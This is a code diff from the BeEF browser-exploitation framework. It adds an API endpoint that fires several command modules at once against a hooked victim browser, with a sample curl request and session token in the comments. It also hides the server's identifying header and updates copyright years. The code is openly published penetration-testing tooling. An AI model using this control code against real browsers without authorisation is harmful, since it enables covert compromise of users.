+        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        #
+        # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
+        #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        #    "modules": [
+        #        {    # test_return_long_string module with custom input
+        #             "mod_id":99,
+        #              "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
+        #        },
+        #        {   # prompt_dialog module with custom input
+        #            "mod_id":116,
+        #            "mod_input":[{"question":"hooked?"}]
+        #        },
+        #        {   # alert_dialog module without input (using default input, if any)
+        #            "mod_id":128,
+        #            "mod_input":[]
+        #        }
+        #    ]
+        #  }
+        # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
+        #
+        # curl example (test_return_long_string and prompt_dialog module with custom inputs)):
+        #
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
+        #  -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
+        #
+        post '/multi_module' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
+            error 401 unless hb != nil
+
+            results = Hash.new
+            if body["modules"] != nil
+              body["modules"].each{|mod|
+                mod_id = mod["mod_id"]
+                mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
+                if mod_k == nil
+                  results[mod_id] = 0
+                  next
+                else
+                  mod_params = []
+                  mod["mod_input"].each{|input|
+                    input.each{|k,v|
+                      mod_params.push({'name' => k, 'value' => v})
+                    }
+                  }
+                  cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
+                  results[mod_id] = cmd_id
+                end
+              }
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
       end
     end
   end

core/main/router/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/router/router.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/server.rb

@@ -1,9 +1,13 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
+# Remove Thin 'Server' response header
+Thin.send :remove_const, :SERVER
+Thin::SERVER = nil
+
 module BeEF
   module Core
 

core/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #